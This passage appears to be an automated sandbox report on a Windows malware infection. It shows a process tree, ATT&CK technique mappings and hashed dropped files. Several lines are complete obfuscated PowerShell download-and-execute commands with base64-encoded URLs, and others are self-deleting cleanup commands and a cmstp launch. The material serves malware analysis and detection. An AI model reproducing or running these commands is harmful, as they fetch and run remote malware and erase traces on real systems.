'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3268
              • C:\Users\Public\fgz.exe
                "C:\Users\Public\fgz.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:5092
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                  6⤵
                    PID:1808
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3216
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                        8⤵
                          PID:2708
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3084
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:4968
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:4328
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 4328 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\877092092833384\\* & exit
                            9⤵
                              PID:1504
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 4328
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4428
                      • C:\Users\Public\fgz.exe
                        "C:\Users\Public\fgz.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2144
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1156
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1952
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:204
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2844
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3128
                    • C:\Users\Public\tdf.exe
                      "C:\Users\Public\tdf.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:5028
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:4348
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:4804
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 4804 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\927643190702608\\* & exit
                            8⤵
                              PID:1560
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 4804
                                9⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3584
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:4368
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4764
                        • C:\Users\Public\tdf.exe
                          "C:\Users\Public\tdf.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops desktop.ini file(s)
                          PID:4436
                          • C:\Users\Admin\AppData\Local\Temp\adTrG3PwTp.exe
                            "C:\Users\Admin\AppData\Local\Temp\adTrG3PwTp.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4552
                          • C:\Users\Admin\AppData\Local\Temp\4JDOc087oh.exe
                            "C:\Users\Admin\AppData\Local\Temp\4JDOc087oh.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4548
                          • C:\Users\Admin\AppData\Local\Temp\ex7vIq0z30.exe
                            "C:\Users\Admin\AppData\Local\Temp\ex7vIq0z30.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:4212
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\broqm2l1.inf
                              8⤵
                                PID:4948
                            • C:\Users\Admin\AppData\Local\Temp\B76924n5pU.exe
                              "C:\Users\Admin\AppData\Local\Temp\B76924n5pU.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4896
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3652
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\tdf.exe"
                              7⤵
                                PID:2520
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:2432
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2368
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3880
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    1⤵
                      PID:4684
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c start C:\Windows\temp\muu10vsc.exe
                        2⤵
                          PID:4680
                          • C:\Windows\temp\muu10vsc.exe
                            C:\Windows\temp\muu10vsc.exe
                            3⤵
                            • Executes dropped EXE
                            PID:496

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Defense Evasion

                      Modify Registry

                      2
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                        MD5

                        02cc7b8ee30056d5912de54f1bdfc219

                        SHA1

                        a6923da95705fb81e368ae48f93d28522ef552fb

                        SHA256

                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                        SHA512

                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB483A9C8338B44FA92EBFE8CDF303EF
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB483A9C8338B44FA92EBFE8CDF303EF
                      • C:\Users\Admin\AppData\LocalLow\sqlite3.dll
                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FIMKNT1S\ds1[1].exe
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KG74DK1A\ds2[1].exe
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QVMYQPI5\rc[1].exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

